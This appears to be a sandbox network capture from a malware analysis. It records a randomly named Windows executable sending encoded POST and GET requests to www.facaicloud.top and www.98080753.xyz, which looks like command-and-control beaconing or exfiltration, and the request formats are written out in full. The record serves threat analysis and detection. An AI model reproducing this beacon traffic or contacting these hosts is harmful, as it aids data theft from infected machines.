Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:05.315924883 CEST | 751 | OUT | POST /dc1u/ HTTP/1.1
Host: www.facaicloud.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.facaicloud.top
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.facaicloud.top/dc1u/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=SHIpoeY+STTSk5h3jj3iRXtns3Dg94CaMfKjUVdbtAmkHyXBWe/Bx3NKkRJR5Iz/1MzYvdLCtFw9tjcllbRHiVC5HLDaQpECBWSmY3QrJzKCJ0xm8tLXqb7LDKcSwY6XHsANJgiAxDcJbvHWvvnuXQn8e7AeAA8I+qAKyMEasXp6wJpB53INk+b1gHj4mZWXlljlhCxQOECsht8tWQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 59644 | 74.48.31.123 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:07.876691103 CEST | 771 | OUT | POST /dc1u/ HTTP/1.1
Host: www.facaicloud.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.facaicloud.top
Content-Length: 239
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.facaicloud.top/dc1u/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=SHIpoeY+STTSldl3vkjiX3tkwnDg0YDTMfGjURNLuyCkHWTBXarBiHNK8BJU3oyz1Mv6vc3CtFk9tisllsFYzVC7LrDYaJECBWSmY3EFJzSCKA1m8PvU0L7IKqcS946THsAjJh+qxBkJbtfWv6TtOAn2DrAABDUHnIcl9McAh11Dx/0jjVEh6vjOkFHOx/Linkn9sgFxRznGs/dpAoTiftGB0dp6gslbXat6L7g=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 59650 | 74.48.31.123 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:10.430186033 CEST | 1784 | OUT | POST /dc1u/ HTTP/1.1
Host: www.facaicloud.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.facaicloud.top
Content-Length: 1251
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.facaicloud.top/dc1u/
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Data Ascii: fvM8Gh=SHIpoeY+STTSldl3vkjiX3tkwnDg0YDTMfGjURNLuyKkGjHBV4DBhHNK0hJV3ozp1Mn+vc7StHc9tE4lnZ5Y6VC7W7DbQpFKBWCiY3UFJzSCKBFmrNLU2L7LDKcewY6vHsIVJh6QyxEJYNPWtI7tGAnwArBTBDJHnJwp9PAmh1ND8oBuyW16v+/17TXp7dDIgm7gmTpqbBroiZsgBJu0D++Q4JF0loweFoReIPfQ3NDt2u+hxKkLtyeoC5KO7nExmsaMVpNi32dwA8Kc5yj7OCE9zoPi3I0J7uprYk/VqUR07c3kTasqx/YxQ6FtWNfbuQvrf056FOYErCDfS9GQGYWnJQMLAeSVIs9CHSLELZ5RCp2PeAyPXCnOzxtbOG+cWVUWZKLQkdBPlhSINgVEBoCw1EF/Uc5dp4XiBeuOBkyAklNLIF8S5xcJnrASjc2tXMmUX61i73JvyrrZ9Tf6Q/pZeFKZFWOpsUqEdKEwGHTyk76SgQKaq6DSpBXyM4icYZH8sWwUJytR1jr5q0ibZ37fdZHlOzRaSe3apSCuFhUtIF375DaYpAlLgR7qgonemkcskPVIp8FmkpK7vxWrJiCUsoz6OLQgkj+3eRtbtTd7I8tt+Ox7+hjmOf67rySZ5g3SmRFjWWgklnR6cdm5HS0VrhxZtQmYaIscek7Zu7fVzulF+zA3eaSHM0xg3JciJyQSZPXnaaKOmkqcBcB4cUvXh35eHesRQ1mHIrrOKy0NQ3TxcdZtBq0IHHwsMnbgjkNBN123Fu5FxvRiiKgQXT+a+F3TPwY09xcwIDiZFq4q26Gduyo74Se8gKxL8ButpNoITYCvRC821AAbfi5I4SOQBi3imqrhywB9sLkcVM3med1lKEu5T4XsCyaRnadnCuU+BNouFtXzD6GoQF/l1R+rj47W+3K72AZu4OkN0x/ajdPX6PLhty1FIuzIBU+K7h9nsKRmp0cwxIDMDusj1d+KUm1cxR+Xp+Cqb0SAVITzQ [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 59651 | 74.48.31.123 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:12.980887890 CEST | 487 | OUT | GET /dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ld HTTP/1.1
                                                                                                                                        Host: www.facaicloud.top
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 59652 | 161.97.168.245 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:26.508106947 CEST | 745 | OUT | POST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 219
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 50 65 6b 4f 52 55 74 56 38 5a 62 2f 51 62 55 69 46 78 69 67 6a 43 2b 4b 53 65 67 4d 6d 47 75 55 78 36 4c 36 67 4b 36 65 57 2b 4d 4a 77 54 42 48 4d 65 31 31 56 5a 55 6c 6f 4f 6b 31 43 79 75 33 51 30 6d 73 36 4c 55 47 55 4a 7a 50 5a 54 36 64 6f 6e 63 6b 41 49 56 35 47 57 49 47 2b 77 54 76 57 30 73 36 48 47 62 68 36 4b 31 31 4a 6e 46 61 49 62 37 4e 61 76 66 76 6c 39 34 76 31 4d 4d 2b 57 49 76 39 67 69 67 6c 52 7a 44 34 53 66 4a 30 47 6c 76 5a 4b 39 46 43 4f 4d 4d 70 66 4a 6f 55 66 58 58 66 50 6f 69 76 4d 33 6a 32 69 50 51 51 45 4b 59 61 4c 63 33 38 69 37 72 76 45 46 63 61 6e 2f 63 6d 59 77 3d 3d
                                                                                                                                        Data Ascii: fvM8Gh=mNRv7J5sXV+jPekORUtV8Zb/QbUiFxigjC+KSegMmGuUx6L6gK6eW+MJwTBHMe11VZUloOk1Cyu3Q0ms6LUGUJzPZT6donckAIV5GWIG+wTvW0s6HGbh6K11JnFaIb7Navfvl94v1MM+WIv9giglRzD4SfJ0GlvZK9FCOMMpfJoUfXXfPoivM3j2iPQQEKYaLc38i7rvEFcan/cmYw==
Oct 23, 2024 07:03:27.366059065 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:27 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Oct 23, 2024 07:03:27.366120100 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 59653 | 161.97.168.245 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:29.054960012 CEST | 765 | OUT | POST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 239
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 41 65 55 4f 54 33 31 56 72 70 62 38 4f 72 55 69 4d 52 69 38 6a 43 79 4b 53 66 30 6c 6e 30 4b 55 79 62 62 36 68 4c 36 65 58 2b 4d 4a 6b 44 42 43 42 2b 31 75 56 59 6f 74 6f 4c 63 31 43 79 36 33 51 31 57 73 76 6f 4d 46 55 5a 7a 4a 55 7a 36 62 72 58 63 6b 41 49 56 35 47 57 4e 6a 2b 77 72 76 57 45 38 36 56 6a 37 69 38 36 31 30 4d 58 46 61 4d 62 37 4a 61 76 65 38 6c 38 6b 57 31 50 30 2b 57 4a 66 39 6a 7a 67 6d 66 7a 44 2b 59 2f 49 52 58 30 4f 43 44 59 6b 39 4b 63 59 75 54 5a 77 69 58 42 4b 39 56 4b 75 44 53 6d 62 4e 6d 4e 30 6d 54 73 46 76 4a 64 7a 6b 76 5a 66 4f 62 79 35 77 71 74 39 69 4f 4a 76 67 73 6c 34 36 44 2f 69 4e 69 2b 31 6d 2f 48 77 70 46 35 4d 3d
                                                                                                                                        Data Ascii: fvM8Gh=mNRv7J5sXV+jAeUOT31Vrpb8OrUiMRi8jCyKSf0ln0KUybb6hL6eX+MJkDBCB+1uVYotoLc1Cy63Q1WsvoMFUZzJUz6brXckAIV5GWNj+wrvWE86Vj7i8610MXFaMb7Jave8l8kW1P0+WJf9jzgmfzD+Y/IRX0OCDYk9KcYuTZwiXBK9VKuDSmbNmN0mTsFvJdzkvZfOby5wqt9iOJvgsl46D/iNi+1m/HwpF5M=
Oct 23, 2024 07:03:29.881151915 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:29 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Oct 23, 2024 07:03:29.881217003 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 59654 | 161.97.168.245 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:31.605112076 CEST | 1778 | OUT | POST /eth5/ HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Origin: http://www.98080753.xyz
                                                                                                                                        Content-Length: 1251
                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Referer: http://www.98080753.xyz/eth5/
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
                                                                                                                                        Data Raw: 66 76 4d 38 47 68 3d 6d 4e 52 76 37 4a 35 73 58 56 2b 6a 41 65 55 4f 54 33 31 56 72 70 62 38 4f 72 55 69 4d 52 69 38 6a 43 79 4b 53 66 30 6c 6e 30 43 55 78 70 44 36 67 6f 43 65 46 4f 4d 4a 6e 44 42 44 42 2b 30 75 56 59 77 70 6f 4c 59 6c 43 77 43 33 51 58 65 73 2b 35 4d 46 65 5a 7a 4a 64 54 36 61 6f 6e 64 35 41 49 45 77 47 57 39 6a 2b 77 72 76 57 42 34 36 44 47 62 69 2b 36 31 31 4a 6e 46 73 49 62 37 78 61 76 33 4a 6c 38 67 5a 31 2f 55 2b 56 70 50 39 7a 52 59 6d 54 7a 44 38 66 2f 49 7a 58 30 43 6e 44 59 52 4f 4b 66 45 41 54 65 63 69 42 6d 69 72 46 75 69 54 51 67 66 44 75 73 63 43 55 50 64 77 50 2f 2b 43 6f 61 7a 41 56 52 68 79 71 4f 78 4d 45 4a 79 39 38 32 59 4b 49 2b 6d 50 73 4f 42 75 75 31 4d 2f 62 4d 6d 6f 63 4a 53 44 2f 2b 42 69 32 47 71 7a 39 75 53 41 37 47 36 55 64 78 49 34 4e 4a 38 64 37 4a 33 76 6d 6e 53 58 58 6d 4f 41 74 2b 54 38 41 4f 47 6d 44 49 34 55 56 39 46 56 75 55 45 4e 64 36 55 30 58 6b 58 41 50 65 75 57 44 38 63 50 64 35 7a 61 65 6f 44 52 65 75 42 2f 6f 2b 43 35 51 71 4d 42 52 4f 4b [TRUNCATED]
Data Ascii: fvM8Gh=mNRv7J5sXV+jAeUOT31Vrpb8OrUiMRi8jCyKSf0ln0CUxpD6goCeFOMJnDBDB+0uVYwpoLYlCwC3QXes+5MFeZzJdT6aond5AIEwGW9j+wrvWB46DGbi+611JnFsIb7xav3Jl8gZ1/U+VpP9zRYmTzD8f/IzX0CnDYROKfEATeciBmirFuiTQgfDuscCUPdwP/+CoazAVRhyqOxMEJy982YKI+mPsOBuu1M/bMmocJSD/+Bi2Gqz9uSA7G6UdxI4NJ8d7J3vmnSXXmOAt+T8AOGmDI4UV9FVuUENd6U0XkXAPeuWD8cPd5zaeoDReuB/o+C5QqMBROK [TRUNCATED]
Oct 23, 2024 07:03:32.440136909 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:32 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: W/"66cd104a-b96"
                                                                                                                                        Content-Encoding: gzip
                                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Oct 23, 2024 07:03:32.440164089 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 59655 | 161.97.168.245 | 80 | 484 | C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 07:03:34.163798094 CEST | 485 | OUT | GET /eth5/?DfDx=AFrxfzcH-Ld&fvM8Gh=rP5P45xZZ1/7FcUVVUJeza+IVqMoIQCjuRWKRMBKl26wwcm/v5roWtgm33BJF8xpb4kfp7QdHQmzbzTt1acSQ4mCbwyezktofLwADktY5A3eXEgsMSOExa06ByFNIL6LLeLE9sVmxY4B HTTP/1.1
                                                                                                                                        Host: www.98080753.xyz
                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                        Connection: close
                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
Oct 23, 2024 07:03:35.010540962 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Wed, 23 Oct 2024 05:03:34 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 2966
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        ETag: "66cd104a-b96"
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
